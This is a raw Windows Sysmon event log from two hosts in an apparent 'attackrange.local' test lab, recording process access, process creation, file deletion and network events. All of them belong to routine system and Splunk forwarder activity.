09:20:28.962{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980616Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.962{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8CDC-6151-047A-00000000FD01}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980615Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.946{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CDC-6151-047A-00000000FD01}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980614Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.947{69CF5F33-8CDC-6151-047A-00000000FD01}3340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980613Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.915{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E71AD27A7C4F505F4AAA131092E12236,SHA256=4D3BC95AB18BF3FF70CC825C932FE5636630A1EBD5D86999293C9C8726545244,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980612Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CDC-6151-037A-00000000FD01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980611Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980610Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980609Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980608Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980607Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980606Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980605Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980604Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980603Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980602Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8CDC-6151-037A-00000000FD01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980601Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.274{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CDC-6151-037A-00000000FD01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980600Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.259{69CF5F33-8CDC-6151-037A-00000000FD01}1772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980599Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:28.056{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D427CCB165FA29DEF822A1C7674DF5,SHA256=918095F31AE9BD9BC810C70D7A8E71C041EF66455CF4E8606330E9F82D627558,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:27.713{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49697-false10.0.1.12-9997- 354300x80000000000000001054308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:27.492{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61544- 354300x80000000000000001054307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:27.429{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52019- 354300x80000000000000001054306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:27.148{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61543- 10341000x80000000000000001054305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.144{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CDC-6151-6F00-00000000FD01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054304Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CDC-6151-6F00-00000000FD01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054303Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054302Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054301Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054300Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054299Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:29.128{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054298Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 